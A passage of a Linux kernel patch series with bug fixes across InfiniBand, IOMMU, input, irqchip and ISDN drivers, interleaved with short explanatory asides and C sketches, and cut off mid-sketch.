+ 	 * Drivers wish to call this before ib_register_driver, so we have to
+ 	 * setup the port data early.
+@@ -2154,9 +2157,6 @@ int ib_device_set_netdev(struct ib_device *ib_dev, struct net_device *ndev,
+ 	if (ret)
+ 		return ret;
+ 
+-	if (!rdma_is_port_valid(ib_dev, port))
+-		return -EINVAL;
+-
+ 	pdata = &ib_dev->port_data[port];
+ 	spin_lock_irqsave(&pdata->netdev_lock, flags);
+ 	old_ndev = rcu_dereference_protected(
+diff --git a/drivers/infiniband/core/iwcm.c b/drivers/infiniband/core/iwcm.c
+index 2b47073c61a65..2d09d1be38f19 100644
+--- a/drivers/infiniband/core/iwcm.c
++++ b/drivers/infiniband/core/iwcm.c
+@@ -369,8 +369,10 @@ EXPORT_SYMBOL(iw_cm_disconnect);
+  *
+  * Clean up all resources associated with the connection and release
+  * the initial reference taken by iw_create_cm_id.
++ *
++ * Returns true if and only if the last cm_id_priv reference has been dropped.
+  */
+-static void destroy_cm_id(struct iw_cm_id *cm_id)
++static bool destroy_cm_id(struct iw_cm_id *cm_id)
+ {
+ 	struct iwcm_id_private *cm_id_priv;
+ 	struct ib_qp *qp;
+@@ -440,7 +442,7 @@ static void destroy_cm_id(struct iw_cm_id *cm_id)
+ 		iwpm_remove_mapping(&cm_id->local_addr, RDMA_NL_IWCM);
+ 	}
+ 
+-	(void)iwcm_deref_id(cm_id_priv);
++	return iwcm_deref_id(cm_id_priv);
+ }
+ 
+ /*
+@@ -451,7 +453,8 @@ static void destroy_cm_id(struct iw_cm_id *cm_id)
+  */
+ void iw_destroy_cm_id(struct iw_cm_id *cm_id)
+ {
+-	destroy_cm_id(cm_id);
++	if (!destroy_cm_id(cm_id))
++		flush_workqueue(iwcm_wq);
+ }
+ EXPORT_SYMBOL(iw_destroy_cm_id);
+ 
+@@ -1035,7 +1038,7 @@ static void cm_work_handler(struct work_struct *_work)
+ 		if (!test_bit(IWCM_F_DROP_EVENTS, &cm_id_priv->flags)) {
+ 			ret = process_event(cm_id_priv, &levent);
+ 			if (ret)
+-				destroy_cm_id(&cm_id_priv->id);
++				WARN_ON_ONCE(destroy_cm_id(&cm_id_priv->id));
+ 		} else
+ 			pr_debug("dropping event %d\n", levent.event);
+ 		if (iwcm_deref_id(cm_id_priv))
+diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+index 6ed0568747eaa..4c34cb1cb7866 100644
+--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
++++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+@@ -2359,7 +2359,7 @@ static int bnxt_re_build_send_wqe(struct bnxt_re_qp *qp,
+ 		break;
+ 	case IB_WR_SEND_WITH_IMM:
+ 		wqe->type = BNXT_QPLIB_SWQE_TYPE_SEND_WITH_IMM;
+-		wqe->send.imm_data = wr->ex.imm_data;
++		wqe->send.imm_data = be32_to_cpu(wr->ex.imm_data);
+ 		break;
+ 	case IB_WR_SEND_WITH_INV:
+ 		wqe->type = BNXT_QPLIB_SWQE_TYPE_SEND_WITH_INV;
+@@ -2389,7 +2389,7 @@ static int bnxt_re_build_rdma_wqe(const struct ib_send_wr *wr,
+ 		break;
+ 	case IB_WR_RDMA_WRITE_WITH_IMM:
+ 		wqe->type = BNXT_QPLIB_SWQE_TYPE_RDMA_WRITE_WITH_IMM;
+-		wqe->rdma.imm_data = wr->ex.imm_data;
++		wqe->rdma.imm_data = be32_to_cpu(wr->ex.imm_data);
+ 		break;
+ 	case IB_WR_RDMA_READ:
+ 		wqe->type = BNXT_QPLIB_SWQE_TYPE_RDMA_READ;
+@@ -3340,7 +3340,7 @@ static void bnxt_re_process_res_shadow_qp_wc(struct bnxt_re_qp *gsi_sqp,
+ 	wc->byte_len = orig_cqe->length;
+ 	wc->qp = &gsi_qp->ib_qp;
+ 
+-	wc->ex.imm_data = orig_cqe->immdata;
++	wc->ex.imm_data = cpu_to_be32(le32_to_cpu(orig_cqe->immdata));
+ 	wc->src_qp = orig_cqe->src_qp;
+ 	memcpy(wc->smac, orig_cqe->smac, ETH_ALEN);
+ 	if (bnxt_re_is_vlan_pkt(orig_cqe, &vlan_id, &sl)) {
+@@ -3476,7 +3476,7 @@ int bnxt_re_poll_cq(struct ib_cq *ib_cq, int num_entries, struct ib_wc *wc)
+ 				 (unsigned long)(cqe->qp_handle),
+ 				 struct bnxt_re_qp, qplib_qp);
+ 			wc->qp = &qp->ib_qp;
+-			wc->ex.imm_data = cqe->immdata;
++			wc->ex.imm_data = cpu_to_be32(le32_to_cpu(cqe->immdata));
+ 			wc->src_qp = cqe->src_qp;
+ 			memcpy(wc->smac, cqe->smac, ETH_ALEN);
+ 			wc->port_num = 1;
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.h b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+index 49d89c0808275..4f1a845f9be6c 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.h
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+@@ -164,7 +164,7 @@ struct bnxt_qplib_swqe {
+ 		/* Send, with imm, inval key */
+ 		struct {
+ 			union {
+-				__be32	imm_data;
++				u32	imm_data;
+ 				u32	inv_key;
+ 			};
+ 			u32		q_key;
+@@ -182,7 +182,7 @@ struct bnxt_qplib_swqe {
+ 		/* RDMA write, with imm, read */
+ 		struct {
+ 			union {
+-				__be32	imm_data;
++				u32	imm_data;
+ 				u32	inv_key;
+ 			};
+ 			u64		remote_va;
+@@ -374,7 +374,7 @@ struct bnxt_qplib_cqe {
+ 	u16				cfa_meta;
+ 	u64				wr_id;
+ 	union {
+-		__be32			immdata;
++		__le32			immdata;
+ 		u32			invrkey;
+ 	};
+ 	u64				qp_handle;
+diff --git a/drivers/infiniband/hw/hns/hns_roce_device.h b/drivers/infiniband/hw/hns/hns_roce_device.h
+index 8748b65c87ea7..a2bdfa026c560 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_device.h
++++ b/drivers/infiniband/hw/hns/hns_roce_device.h
+@@ -82,6 +82,7 @@
+ #define MR_TYPE_DMA				0x03
+ 
+ #define HNS_ROCE_FRMR_MAX_PA			512
++#define HNS_ROCE_FRMR_ALIGN_SIZE		128
+ 
+ #define PKEY_ID					0xffff
+ #define NODE_DESC_SIZE				64
+@@ -90,6 +91,8 @@
+ /* Configure to HW for PAGE_SIZE larger than 4KB */
+ #define PG_SHIFT_OFFSET				(PAGE_SHIFT - 12)
+ 
++#define ATOMIC_WR_LEN				8
++
+ #define HNS_ROCE_IDX_QUE_ENTRY_SZ		4
+ #define SRQ_DB_REG				0x230
+ 
+@@ -180,6 +183,9 @@ enum {
+ #define HNS_HW_PAGE_SHIFT			12
+ #define HNS_HW_PAGE_SIZE			(1 << HNS_HW_PAGE_SHIFT)
+ 
++#define HNS_HW_MAX_PAGE_SHIFT			27
++#define HNS_HW_MAX_PAGE_SIZE			(1 << HNS_HW_MAX_PAGE_SHIFT)
++
+ struct hns_roce_uar {
+ 	u64		pfn;
+ 	unsigned long	index;
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index c931cce50d50d..c4521ab66ee45 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -602,11 +602,16 @@ static inline int set_rc_wqe(struct hns_roce_qp *qp,
+ 		     (wr->send_flags & IB_SEND_SIGNALED) ? 1 : 0);
+ 
+ 	if (wr->opcode == IB_WR_ATOMIC_CMP_AND_SWP ||
+-	    wr->opcode == IB_WR_ATOMIC_FETCH_AND_ADD)
++	    wr->opcode == IB_WR_ATOMIC_FETCH_AND_ADD) {
++		if (msg_len != ATOMIC_WR_LEN)
++			return -EINVAL;
+ 		set_atomic_seg(wr, rc_sq_wqe, valid_num_sge);
+-	else if (wr->opcode != IB_WR_REG_MR)
++	} else if (wr->opcode != IB_WR_REG_MR) {
+ 		ret = set_rwqe_data_seg(&qp->ibqp, wr, rc_sq_wqe,
+ 					&curr_idx, valid_num_sge);
++		if (ret)
++			return ret;
++	}
+ 
+ 	/*
+ 	 * The pipeline can sequentially post all valid WQEs into WQ buffer,
+@@ -2569,14 +2574,16 @@ static int set_llm_cfg_to_hw(struct hns_roce_dev *hr_dev,
+ static struct hns_roce_link_table *
+ alloc_link_table_buf(struct hns_roce_dev *hr_dev)
+ {
++	u16 total_sl = hr_dev->caps.sl_num * hr_dev->func_num;
+ 	struct hns_roce_v2_priv *priv = hr_dev->priv;
+ 	struct hns_roce_link_table *link_tbl;
+ 	u32 pg_shift, size, min_size;
+ 
+ 	link_tbl = &priv->ext_llm;
+ 	pg_shift = hr_dev->caps.llm_buf_pg_sz + PAGE_SHIFT;
+-	size = hr_dev->caps.num_qps * HNS_ROCE_V2_EXT_LLM_ENTRY_SZ;
+-	min_size = HNS_ROCE_EXT_LLM_MIN_PAGES(hr_dev->caps.sl_num) << pg_shift;
++	size = hr_dev->caps.num_qps * hr_dev->func_num *
++	       HNS_ROCE_V2_EXT_LLM_ENTRY_SZ;
++	min_size = HNS_ROCE_EXT_LLM_MIN_PAGES(total_sl) << pg_shift;
+ 
+ 	/* Alloc data table */
+ 	size = max(size, min_size);
+@@ -6413,9 +6420,16 @@ static void hns_roce_v2_int_mask_enable(struct hns_roce_dev *hr_dev,
+ 	roce_write(hr_dev, ROCEE_VF_ABN_INT_CFG_REG, enable_flag);
+ }
+ 
+-static void hns_roce_v2_destroy_eqc(struct hns_roce_dev *hr_dev, u32 eqn)
++static void free_eq_buf(struct hns_roce_dev *hr_dev, struct hns_roce_eq *eq)
++{
++	hns_roce_mtr_destroy(hr_dev, &eq->mtr);
++}
++
++static void hns_roce_v2_destroy_eqc(struct hns_roce_dev *hr_dev,
++				    struct hns_roce_eq *eq)
+ {
+ 	struct device *dev = hr_dev->dev;
++	int eqn = eq->eqn;
+ 	int ret;
+ 	u8 cmd;
+ 
+@@ -6426,12 +6440,9 @@ static void hns_roce_v2_destroy_eqc(struct hns_roce_dev *hr_dev, u32 eqn)
+ 
+ 	ret = hns_roce_destroy_hw_ctx(hr_dev, cmd, eqn & HNS_ROCE_V2_EQN_M);
+ 	if (ret)
+-		dev_err(dev, "[mailbox cmd] destroy eqc(%u) failed.\n", eqn);
+-}
++		dev_err(dev, "[mailbox cmd] destroy eqc(%d) failed.\n", eqn);
+ 
+-static void free_eq_buf(struct hns_roce_dev *hr_dev, struct hns_roce_eq *eq)
+-{
+-	hns_roce_mtr_destroy(hr_dev, &eq->mtr);
++	free_eq_buf(hr_dev, eq);
+ }
+ 
+ static void init_eq_config(struct hns_roce_dev *hr_dev, struct hns_roce_eq *eq)
+@@ -6737,7 +6748,7 @@ static int hns_roce_v2_init_eq_table(struct hns_roce_dev *hr_dev)
+ 
+ err_create_eq_fail:
+ 	for (i -= 1; i >= 0; i--)
+-		free_eq_buf(hr_dev, &eq_table->eq[i]);
++		hns_roce_v2_destroy_eqc(hr_dev, &eq_table->eq[i]);
+ 	kfree(eq_table->eq);
+ 
+ 	return ret;
+@@ -6757,11 +6768,8 @@ static void hns_roce_v2_cleanup_eq_table(struct hns_roce_dev *hr_dev)
+ 	__hns_roce_free_irq(hr_dev);
+ 	destroy_workqueue(hr_dev->irq_workq);
+ 
+-	for (i = 0; i < eq_num; i++) {
+-		hns_roce_v2_destroy_eqc(hr_dev, i);
+-
+-		free_eq_buf(hr_dev, &eq_table->eq[i]);
+-	}
++	for (i = 0; i < eq_num; i++)
++		hns_roce_v2_destroy_eqc(hr_dev, &eq_table->eq[i]);
+ 
+ 	kfree(eq_table->eq);
+ }
+diff --git a/drivers/infiniband/hw/hns/hns_roce_mr.c b/drivers/infiniband/hw/hns/hns_roce_mr.c
+index 190e62da98e4b..980261969b0c0 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_mr.c
++++ b/drivers/infiniband/hw/hns/hns_roce_mr.c
+@@ -423,6 +423,11 @@ int hns_roce_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sg, int sg_nents,
+ 	struct hns_roce_mtr *mtr = &mr->pbl_mtr;
+ 	int ret, sg_num = 0;
+ 
++	if (!IS_ALIGNED(*sg_offset, HNS_ROCE_FRMR_ALIGN_SIZE) ||
++	    ibmr->page_size < HNS_HW_PAGE_SIZE ||
++	    ibmr->page_size > HNS_HW_MAX_PAGE_SIZE)
++		return sg_num;
++
+ 	mr->npages = 0;
+ 	mr->page_list = kvcalloc(mr->pbl_mtr.hem_cfg.buf_pg_count,
+ 				 sizeof(dma_addr_t), GFP_KERNEL);
+diff --git a/drivers/infiniband/hw/hns/hns_roce_qp.c b/drivers/infiniband/hw/hns/hns_roce_qp.c
+index 7b79e6b3f3baa..c97b5dba17728 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_qp.c
++++ b/drivers/infiniband/hw/hns/hns_roce_qp.c
+@@ -538,13 +538,15 @@ static unsigned int get_sge_num_from_max_inl_data(bool is_ud_or_gsi,
+ {
+ 	unsigned int inline_sge;
+ 
+-	inline_sge = roundup_pow_of_two(max_inline_data) / HNS_ROCE_SGE_SIZE;
++	if (!max_inline_data)
++		return 0;
+ 
+ 	/*
+ 	 * if max_inline_data less than
+ 	 * HNS_ROCE_SGE_IN_WQE * HNS_ROCE_SGE_SIZE,
+ 	 * In addition to ud's mode, no need to extend sge.
+ 	 */
++	inline_sge = roundup_pow_of_two(max_inline_data) / HNS_ROCE_SGE_SIZE;
+ 	if (!is_ud_or_gsi && inline_sge <= HNS_ROCE_SGE_IN_WQE)
+ 		inline_sge = 0;
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_srq.c b/drivers/infiniband/hw/hns/hns_roce_srq.c
+index 6a4923c21cbc6..727f926500712 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_srq.c
++++ b/drivers/infiniband/hw/hns/hns_roce_srq.c
+@@ -296,7 +296,7 @@ static int set_srq_basic_param(struct hns_roce_srq *srq,
+ 
+ 	max_sge = proc_srq_sge(hr_dev, srq, !!udata);
+ 	if (attr->max_wr > hr_dev->caps.max_srq_wrs ||
+-	    attr->max_sge > max_sge) {
++	    attr->max_sge > max_sge || !attr->max_sge) {
+ 		ibdev_err(&hr_dev->ib_dev,
+ 			  "invalid SRQ attr, depth = %u, sge = %u.\n",
+ 			  attr->max_wr, attr->max_sge);
+diff --git a/drivers/infiniband/hw/mlx4/alias_GUID.c b/drivers/infiniband/hw/mlx4/alias_GUID.c
+index 111fa88a3be44..9a439569ffcf3 100644
+--- a/drivers/infiniband/hw/mlx4/alias_GUID.c
++++ b/drivers/infiniband/hw/mlx4/alias_GUID.c
+@@ -829,7 +829,7 @@ void mlx4_ib_destroy_alias_guid_service(struct mlx4_ib_dev *dev)
+ 
+ int mlx4_ib_init_alias_guid_service(struct mlx4_ib_dev *dev)
+ {
+-	char alias_wq_name[15];
++	char alias_wq_name[22];
+ 	int ret = 0;
+ 	int i, j;
+ 	union ib_gid gid;
+diff --git a/drivers/infiniband/hw/mlx4/mad.c b/drivers/infiniband/hw/mlx4/mad.c
+index a37cfac5e23f9..dc9cf45d2d320 100644
+--- a/drivers/infiniband/hw/mlx4/mad.c
++++ b/drivers/infiniband/hw/mlx4/mad.c
+@@ -2158,7 +2158,7 @@ static int mlx4_ib_alloc_demux_ctx(struct mlx4_ib_dev *dev,
+ 				       struct mlx4_ib_demux_ctx *ctx,
+ 				       int port)
+ {
+-	char name[12];
++	char name[21];
+ 	int ret = 0;
+ 	int i;
+ 
+diff --git a/drivers/infiniband/hw/mlx5/mlx5_ib.h b/drivers/infiniband/hw/mlx5/mlx5_ib.h
+index 8d94e6834e01b..0ef347e91ffeb 100644
+--- a/drivers/infiniband/hw/mlx5/mlx5_ib.h
++++ b/drivers/infiniband/hw/mlx5/mlx5_ib.h
+@@ -109,6 +109,19 @@ unsigned long __mlx5_umem_find_best_quantized_pgoff(
+ 		__mlx5_bit_sz(typ, page_offset_fld), 0, scale,                 \
+ 		page_offset_quantized)
+ 
++static inline unsigned long
++mlx5_umem_dmabuf_find_best_pgsz(struct ib_umem_dmabuf *umem_dmabuf)
++{
++	/*
++	 * mkeys used for dmabuf are fixed at PAGE_SIZE because we must be able
++	 * to hold any sgl after a move operation. Ideally the mkc page size
++	 * could be changed at runtime to be optimal, but right now the driver
++	 * cannot do that.
++	 */
++	return ib_umem_find_best_pgsz(&umem_dmabuf->umem, PAGE_SIZE,
++				      umem_dmabuf->umem.iova);
++}
++
+ enum {
+ 	MLX5_IB_MMAP_OFFSET_START = 9,
+ 	MLX5_IB_MMAP_OFFSET_END = 255,
+diff --git a/drivers/infiniband/hw/mlx5/odp.c b/drivers/infiniband/hw/mlx5/odp.c
+index bc97958818bb5..af73c5ebe6ac5 100644
+--- a/drivers/infiniband/hw/mlx5/odp.c
++++ b/drivers/infiniband/hw/mlx5/odp.c
+@@ -706,10 +706,8 @@ static int pagefault_dmabuf_mr(struct mlx5_ib_mr *mr, size_t bcnt,
+ 		return err;
+ 	}
+ 
+-	page_size = mlx5_umem_find_best_pgsz(&umem_dmabuf->umem, mkc,
+-					     log_page_size, 0,
+-					     umem_dmabuf->umem.iova);
+-	if (unlikely(page_size < PAGE_SIZE)) {
++	page_size = mlx5_umem_dmabuf_find_best_pgsz(umem_dmabuf);
++	if (!page_size) {
+ 		ib_umem_dmabuf_unmap_pages(umem_dmabuf);
+ 		err = -EINVAL;
+ 	} else {
+diff --git a/drivers/infiniband/sw/rxe/rxe_req.c b/drivers/infiniband/sw/rxe/rxe_req.c
+index 2ace1007a4195..35768fdbd5b74 100644
+--- a/drivers/infiniband/sw/rxe/rxe_req.c
++++ b/drivers/infiniband/sw/rxe/rxe_req.c
+@@ -390,7 +390,7 @@ static struct sk_buff *init_req_packet(struct rxe_qp *qp,
+ 	int			paylen;
+ 	int			solicited;
+ 	u32			qp_num;
+-	int			ack_req;
++	int			ack_req = 0;
+ 
+ 	/* length from start of bth to end of icrc */
+ 	paylen = rxe_opcode[opcode].length + payload + pad + RXE_ICRC_SIZE;
+@@ -411,8 +411,9 @@ static struct sk_buff *init_req_packet(struct rxe_qp *qp,
+ 	qp_num = (pkt->mask & RXE_DETH_MASK) ? ibwr->wr.ud.remote_qpn :
+ 					 qp->attr.dest_qp_num;
+ 
+-	ack_req = ((pkt->mask & RXE_END_MASK) ||
+-		(qp->req.noack_pkts++ > RXE_MAX_PKT_PER_ACK));
++	if (qp_type(qp) != IB_QPT_UD && qp_type(qp) != IB_QPT_UC)
++		ack_req = ((pkt->mask & RXE_END_MASK) ||
++			   (qp->req.noack_pkts++ > RXE_MAX_PKT_PER_ACK));
+ 	if (ack_req)
+ 		qp->req.noack_pkts = 0;
+ 
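
For background, UD and UC transports have no acknowledgement protocol, so setting the BTH ack-request bit (or advancing the unacked-packet counter) on those QPs is meaningless; only reliable QPs should ever request an ACK. A small sketch of the guarded pattern, with illustrative names standing in for the rxe types:

    #include <stdbool.h>
    #include <stdio.h>

    enum qp_type { QPT_RC, QPT_UC, QPT_UD };    /* illustrative subset */
    #define MAX_PKT_PER_ACK 64                  /* assumed stand-in */

    /* Request an ACK only on reliable QPs: either this is the last
     * packet of the request, or enough unacked packets have piled up. */
    static bool want_ack(enum qp_type type, bool end_of_req,
                         unsigned int *noack)
    {
            bool ack = false;

            if (type != QPT_UD && type != QPT_UC)
                    ack = end_of_req || (*noack)++ > MAX_PKT_PER_ACK;
            if (ack)
                    *noack = 0;
            return ack;
    }

    int main(void)
    {
            unsigned int noack = 0;

            printf("UD: %d\n", want_ack(QPT_UD, true, &noack));    /* 0 */
            printf("RC: %d\n", want_ack(QPT_RC, true, &noack));    /* 1 */
            return 0;
    }
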
+diff --git a/drivers/input/keyboard/qt1050.c b/drivers/input/keyboard/qt1050.c
+index 403060d05c3b3..7193a4198e214 100644
+--- a/drivers/input/keyboard/qt1050.c
++++ b/drivers/input/keyboard/qt1050.c
+@@ -226,7 +226,12 @@ static bool qt1050_identify(struct qt1050_priv *ts)
+ 	int err;
+ 
+ 	/* Read Chip ID */
+-	regmap_read(ts->regmap, QT1050_CHIP_ID, &val);
++	err = regmap_read(ts->regmap, QT1050_CHIP_ID, &val);
++	if (err) {
++		dev_err(&ts->client->dev, "Failed to read chip ID: %d\n", err);
++		return false;
++	}
++
+ 	if (val != QT1050_CHIP_ID_VER) {
+ 		dev_err(&ts->client->dev, "ID %d not supported\n", val);
+ 		return false;
+diff --git a/drivers/input/mouse/elan_i2c_core.c b/drivers/input/mouse/elan_i2c_core.c
+index d4eb59b55bf1f..5fa0d6ef627bc 100644
+--- a/drivers/input/mouse/elan_i2c_core.c
++++ b/drivers/input/mouse/elan_i2c_core.c
+@@ -1372,6 +1372,8 @@ static int __maybe_unused elan_suspend(struct device *dev)
+ 	}
+ 
+ err:
++	if (ret)
++		enable_irq(client->irq);
+ 	mutex_unlock(&data->sysfs_mutex);
+ 	return ret;
+ }
+diff --git a/drivers/interconnect/qcom/qcm2290.c b/drivers/interconnect/qcom/qcm2290.c
+index ca7ad37ea6777..d75bb918e1bb7 100644
+--- a/drivers/interconnect/qcom/qcm2290.c
++++ b/drivers/interconnect/qcom/qcm2290.c
+@@ -166,7 +166,7 @@ static struct qcom_icc_node mas_snoc_bimc = {
+ 	.qos.ap_owned = true,
+ 	.qos.qos_port = 6,
+ 	.qos.qos_mode = NOC_QOS_MODE_BYPASS,
+-	.mas_rpm_id = 164,
++	.mas_rpm_id = 3,
+ 	.slv_rpm_id = -1,
+ 	.num_links = ARRAY_SIZE(mas_snoc_bimc_links),
+ 	.links = mas_snoc_bimc_links,
+diff --git a/drivers/iommu/intel/iommu.c b/drivers/iommu/intel/iommu.c
+index e111b35a7aff2..7b9502c30fe94 100644
+--- a/drivers/iommu/intel/iommu.c
++++ b/drivers/iommu/intel/iommu.c
+@@ -113,13 +113,17 @@ static inline unsigned long lvl_to_nr_pages(unsigned int lvl)
+ 
+ /* VT-d pages must always be _smaller_ than MM pages. Otherwise things
+    are never going to work. */
+-static inline unsigned long mm_to_dma_pfn(unsigned long mm_pfn)
++static inline unsigned long mm_to_dma_pfn_start(unsigned long mm_pfn)
+ {
+ 	return mm_pfn << (PAGE_SHIFT - VTD_PAGE_SHIFT);
+ }
++static inline unsigned long mm_to_dma_pfn_end(unsigned long mm_pfn)
++{
++	return ((mm_pfn + 1) << (PAGE_SHIFT - VTD_PAGE_SHIFT)) - 1;
++}
+ static inline unsigned long page_to_dma_pfn(struct page *pg)
+ {
+-	return mm_to_dma_pfn(page_to_pfn(pg));
++	return mm_to_dma_pfn_start(page_to_pfn(pg));
+ }
+ static inline unsigned long virt_to_dma_pfn(void *p)
+ {
+@@ -2439,8 +2443,8 @@ static int __init si_domain_init(int hw)
+ 
+ 		for_each_mem_pfn_range(i, nid, &start_pfn, &end_pfn, NULL) {
+ 			ret = iommu_domain_identity_map(si_domain,
+-					mm_to_dma_pfn(start_pfn),
+-					mm_to_dma_pfn(end_pfn));
++					mm_to_dma_pfn_start(start_pfn),
++					mm_to_dma_pfn_end(end_pfn-1));
+ 			if (ret)
+ 				return ret;
+ 		}
+@@ -2461,8 +2465,8 @@ static int __init si_domain_init(int hw)
+ 				continue;
+ 
+ 			ret = iommu_domain_identity_map(si_domain,
+-					mm_to_dma_pfn(start >> PAGE_SHIFT),
+-					mm_to_dma_pfn(end >> PAGE_SHIFT));
++					mm_to_dma_pfn_start(start >> PAGE_SHIFT),
++					mm_to_dma_pfn_end(end >> PAGE_SHIFT));
+ 			if (ret)
+ 				return ret;
+ 		}
+@@ -3698,8 +3702,8 @@ static int intel_iommu_memory_notifier(struct notifier_block *nb,
+ 				       unsigned long val, void *v)
+ {
+ 	struct memory_notify *mhp = v;
+-	unsigned long start_vpfn = mm_to_dma_pfn(mhp->start_pfn);
+-	unsigned long last_vpfn = mm_to_dma_pfn(mhp->start_pfn +
++	unsigned long start_vpfn = mm_to_dma_pfn_start(mhp->start_pfn);
++	unsigned long last_vpfn = mm_to_dma_pfn_end(mhp->start_pfn +
+ 			mhp->nr_pages - 1);
+ 
+ 	switch (val) {
+@@ -4401,7 +4405,7 @@ static void intel_iommu_tlb_sync(struct iommu_domain *domain,
+ 	unsigned long i;
+ 
+ 	nrpages = aligned_nrpages(gather->start, size);
+-	start_pfn = mm_to_dma_pfn(iova_pfn);
++	start_pfn = mm_to_dma_pfn_start(iova_pfn);
+ 
+ 	xa_for_each(&dmar_domain->iommu_array, i, info)
+ 		iommu_flush_iotlb_psi(info->iommu, dmar_domain,
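
The new start/end helpers matter whenever MM pages are larger than VT-d pages: one MM pfn then covers a range of DMA pfns, and converting only the start silently dropped the tail of that range. A standalone sketch of the arithmetic, assuming 16 KiB MM pages over 4 KiB VT-d pages:

    #include <stdio.h>

    #define PAGE_SHIFT      14    /* assumed 16 KiB MM pages */
    #define VTD_PAGE_SHIFT  12    /* 4 KiB VT-d pages */

    static unsigned long mm_to_dma_pfn_start(unsigned long mm_pfn)
    {
            return mm_pfn << (PAGE_SHIFT - VTD_PAGE_SHIFT);
    }

    /* Last DMA pfn covered by this MM pfn: the start of the *next*
     * MM page, minus one. */
    static unsigned long mm_to_dma_pfn_end(unsigned long mm_pfn)
    {
            return ((mm_pfn + 1) << (PAGE_SHIFT - VTD_PAGE_SHIFT)) - 1;
    }

    int main(void)
    {
            unsigned long pfn = 5;

            /* MM pfn 5 spans DMA pfns 20..23; mapping only the start
             * would cover a quarter of the page. */
            printf("dma pfns %lu..%lu\n",
                   mm_to_dma_pfn_start(pfn), mm_to_dma_pfn_end(pfn));
            return 0;
    }
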
+diff --git a/drivers/iommu/sprd-iommu.c b/drivers/iommu/sprd-iommu.c
+index e4358393fe378..71d22daaec2ed 100644
+--- a/drivers/iommu/sprd-iommu.c
++++ b/drivers/iommu/sprd-iommu.c
+@@ -234,8 +234,8 @@ static void sprd_iommu_cleanup(struct sprd_iommu_domain *dom)
+ 
+ 	pgt_size = sprd_iommu_pgt_size(&dom->domain);
+ 	dma_free_coherent(dom->sdev->dev, pgt_size, dom->pgt_va, dom->pgt_pa);
+-	dom->sdev = NULL;
+ 	sprd_iommu_hw_en(dom->sdev, false);
++	dom->sdev = NULL;
+ }
+ 
+ static void sprd_iommu_domain_free(struct iommu_domain *domain)
+diff --git a/drivers/irqchip/irq-imx-irqsteer.c b/drivers/irqchip/irq-imx-irqsteer.c
+index 96230a04ec238..44ce85c27f57a 100644
+--- a/drivers/irqchip/irq-imx-irqsteer.c
++++ b/drivers/irqchip/irq-imx-irqsteer.c
+@@ -35,6 +35,7 @@ struct irqsteer_data {
+ 	int			channel;
+ 	struct irq_domain	*domain;
+ 	u32			*saved_reg;
++	struct device		*dev;
+ };
+ 
+ static int imx_irqsteer_get_reg_index(struct irqsteer_data *data,
+@@ -71,10 +72,26 @@ static void imx_irqsteer_irq_mask(struct irq_data *d)
+ 	raw_spin_unlock_irqrestore(&data->lock, flags);
+ }
+ 
++static void imx_irqsteer_irq_bus_lock(struct irq_data *d)
++{
++	struct irqsteer_data *data = d->chip_data;
++
++	pm_runtime_get_sync(data->dev);
++}
++
++static void imx_irqsteer_irq_bus_sync_unlock(struct irq_data *d)
++{
++	struct irqsteer_data *data = d->chip_data;
++
++	pm_runtime_put_autosuspend(data->dev);
++}
++
+ static const struct irq_chip imx_irqsteer_irq_chip = {
+-	.name		= "irqsteer",
+-	.irq_mask	= imx_irqsteer_irq_mask,
+-	.irq_unmask	= imx_irqsteer_irq_unmask,
++	.name			= "irqsteer",
++	.irq_mask		= imx_irqsteer_irq_mask,
++	.irq_unmask		= imx_irqsteer_irq_unmask,
++	.irq_bus_lock		= imx_irqsteer_irq_bus_lock,
++	.irq_bus_sync_unlock	= imx_irqsteer_irq_bus_sync_unlock,
+ };
+ 
+ static int imx_irqsteer_irq_map(struct irq_domain *h, unsigned int irq,
+@@ -149,6 +166,7 @@ static int imx_irqsteer_probe(struct platform_device *pdev)
+ 	if (!data)
+ 		return -ENOMEM;
+ 
++	data->dev = &pdev->dev;
+ 	data->regs = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(data->regs)) {
+ 		dev_err(&pdev->dev, "failed to initialize reg\n");
+diff --git a/drivers/isdn/hardware/mISDN/hfcmulti.c b/drivers/isdn/hardware/mISDN/hfcmulti.c
+index e840609c50eb7..2063afffd0853 100644
+--- a/drivers/isdn/hardware/mISDN/hfcmulti.c
++++ b/drivers/isdn/hardware/mISDN/hfcmulti.c
+@@ -1931,7 +1931,7 @@ hfcmulti_dtmf(struct hfc_multi *hc)
+ static void
+ hfcmulti_tx(struct hfc_multi *hc, int ch)
+ {
+-	int i, ii, temp, len = 0;
++	int i, ii, temp, tmp_len, len = 0;
+ 	int Zspace, z1, z2; /* must be int for calculation */
+ 	int Fspace, f1, f2;
+ 	u_char *d;
+@@ -2152,14 +2152,15 @@ hfcmulti_tx(struct hfc_multi *hc, int ch)
+ 		HFC_wait_nodebug(hc);
+ 	}
+ 
++	tmp_len = (*sp)->len;
+ 	dev_kfree_skb(*sp);
+ 	/* check for next frame */
+ 	if (bch && get_next_bframe(bch)) {
+-		len = (*sp)->len;
++		len = tmp_len;
+ 		goto next_frame;
+ 	}
+ 	if (dch && get_next_dframe(dch)) {
+-		len = (*sp)->len;
++		len = tmp_len;
+ 		goto next_frame;
+ 	}
+ 
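
The hfcmulti change is the save-before-free idiom: the skb's length must be captured before dev_kfree_skb() releases it, since the later (*sp)->len reads touched freed (or already-replaced) memory once get_next_bframe()/get_next_dframe() had run. The shape of the fix in isolation:

    #include <stdio.h>
    #include <stdlib.h>

    struct frame {
            int len;
            /* payload ... */
    };

    int main(void)
    {
            struct frame *f = malloc(sizeof(*f));
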